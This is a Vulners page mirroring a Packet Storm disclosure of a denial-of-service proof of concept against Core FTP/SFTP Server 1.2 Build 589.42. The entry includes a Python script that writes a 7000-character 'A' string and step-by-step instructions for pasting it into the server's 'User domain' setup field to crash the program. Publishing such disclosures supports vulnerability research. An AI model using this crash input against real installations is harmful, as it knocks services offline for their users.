Lucene search
K

Core FTP/SFTP Server 1.2 Build 589.42 Denial Of Service

🗓️ 15 Feb 2019 00:00:00Reported by Victor MondragonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

Core FTP/SFTP Server 1.2 Build 589.42 Denial of Service Exploi

Code
`#Exploit Title: Core FTP/SFTP Server 1.2 - Build 589.42 - Denial of Service (PoC)  
#Discovery by: Victor MondragA3n  
#Discovery Date: 2019-02-13  
#Vendor Homepage: http://www.coreftp.com/  
#Software Link: http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe  
#Tested Version: v2-Build 673  
#Tested on: Windows 7 Service Pack 1 x32  
  
#Steps to produce the crash:  
#1.- Run python code: Core_FTP_SFTP_Server_1.2.py  
#2.- Open core_code.txt and copy content to clipboard  
#3.- Open Core FTP Server  
#4.- Select "Setup" > "New"  
#5.- Select "Domain Name" and Put "Test"  
#6.- Select "Domain IP/Address" and Put "1.1.1.1"   
#7.- Select "Base directory" and Choose a directory path  
#8.- Enable "WinNT users"   
#9.- Select "User domain" and Paste Clipboard  
#10.- Click on "Ok" and the next window click "Ok"  
#11.- Crashed  
  
cod = "\x41" * 7000  
  
f = open('core_code.txt', 'w')  
f.write(cod)  
f.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation